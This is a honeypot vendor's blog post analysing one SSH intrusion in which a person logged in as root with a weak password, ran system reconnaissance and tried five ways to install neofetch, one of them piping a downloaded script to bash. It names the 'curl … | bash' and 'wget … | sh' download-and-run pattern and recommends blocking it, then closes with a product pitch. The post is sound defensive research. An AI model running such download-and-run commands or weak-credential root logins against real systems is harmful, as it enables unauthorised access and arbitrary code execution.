It wasn't a bot: it was a person
The clue is in the SSH client. Most of the attacks we see come from automated libraries that announce themselves. This session arrived from Bitvise SSH Client (Tunnelier) 9.61 — a graphical Windows client. There was someone behind the keyboard.
They logged in as root with the password admin123. A weak credential, tried by hand, that worked against the decoy. And what they did next looks nothing like a script: it looks like a person poking around.
First, the reconnaissance
The first command was a burst of system reconnaissance on a single line — who am I, what CPU, how much RAM, how much disk, how long it's been up:
So far, normal. Reconnaissance is the first step of almost any intrusion. The interesting part is what came next: instead of installing a miner, a bot or a backdoor, our visitor wanted something far more vain.
Five attempts to install neofetch
neofetch is a tool that draws the system logo and its specs in color — the typical "look at my machine" screenshot. And this person was determined to run it. When one method failed in the isolated environment, they tried another:
Five routes to the same trivial goal. A bot doesn't do that — a bot runs its recipe and leaves. This is someone troubleshooting live, getting frustrated with a system that wasn't giving back what they expected.
Why we still flag it as critical
The second attempt is the reason. curl ... | bash downloads a script from a URL and runs it directly, without touching disk or any review. The honeypot captured the real content: a 368 KB shell script. It turned out to be the legitimate neofetch. But we didn't know that until we captured it — and that's exactly the point.
curl | bashThe pattern is dangerous by design, not because of the specific payload. Whoever controls that URL decides what runs on your machine, today and tomorrow. Today it was neofetch; one change on the remote server and tomorrow it's something else. That's why it's flagged critical regardless of what it returns: the risk is the mechanism, not the file.
The trail: where it came from
The connection came from infrastructure in Istanbul (ArvanCloud, AS57568), at 18:39 local time — 15:39 UTC. An afternoon: a plausible time for a person, not for a cron job. An important nuance, with no embellishment: that's the origin of the infrastructure, not necessarily where the person typing is. ArvanCloud is hosting/CDN and may well be an intermediate hop.
The most revealing cross-reference: 65% of the traffic comes from hosting in the Netherlands — cheap bot farms replicating the same sweep over and over. The person in this session didn't come from there: they came from Istanbul, outside the focus of the noise. Two worlds in the same decoy.
sha256: 2a272bbaa1275f21835fd3258fb8032ccdc98348e6ccb9cf58acacd366340170
shell script · 368 KB · neofetch (MIT, legitimate). The full hash lets you verify that what was downloaded was the real neofetch and not an impostor with the same name. It's what separates "it looked harmless" from "we checked it".
And here's the number that puts this in context: the sessions that arrive with a desktop client (Bitvise, PuTTY) number 1,409 of 268,155 — barely 0.5% of the traffic. The vast majority are headless libraries repeating a recipe. This one had someone deciding live.
And a cross-reference that puts neofetch in its place: across the 268,155 sessions in the corpus, the #1 command is uname (106,796 times), and the podium is dominated by hardware reconnaissance — grep, lspci, nvidia-smi. This person just wanted the pretty version of what almost everyone does right after getting in: figuring out what machine they've landed on. The difference is that they tried it five times, by hand.
Human vs bot: why the difference matters
Separating human sessions from automated ones changes how you prioritize. Three signals that gave this person away:
- Graphical desktop client: botnets use headless libraries, not Bitvise Tunnelier on Windows.
- Varied retries: five methods for the same goal = a person adapting, not a script repeating a fixed recipe.
- A goal with no monetization value: showing off specs doesn't install a miner or steal anything. It's exploratory behavior, almost out of curiosity.
A human attacker changes the risk calculation: they improvise, they try what you didn't expect, and sometimes they come back. Treating every intrusion as automated noise makes you miss exactly the ones with a person behind them.
What to do
- Block
curl … | bashandwget … | shin SSH sessions: no legitimate maintenance needs to download-and-run in a single command. - Treat a
rootlogin from a desktop SSH client as a high signal: it's a human-operator pattern, not a mass sweep. - Capture the downloaded content, not just the URL: the URL looked harmless (GitHub); the value is in having the binary to verify what it really was.
- Credentials like
admin123still open doors: the human factor on the other side tries exactly the ones a tired team leaves in place.
What's valuable about this session isn't neofetch. It's the reminder that, beneath the figures, there are people making decisions in real time. For years we've treated intrusions as automated noise. A well-placed decoy is where you finally see the adversary — not their log, them.
CipherSentry deploys an SSH decoy that captures every real command and every real download, isolates them and shows them to you on a dashboard. We watched this person install neofetch five times; you'll see whoever knocks on your door.
See how it works →Data collected for cybersecurity research purposes. All information comes from unsolicited activity recorded on our own infrastructure. IP and URLs obfuscated ([.], hxxp) to prevent accidental clicks.
honeypot CipherSentry · sesión 9d00286f · IP 194.5.[REDACTED].238 · 2026-06-17 · contexto: 268.155 sesiones / 1.169 IPs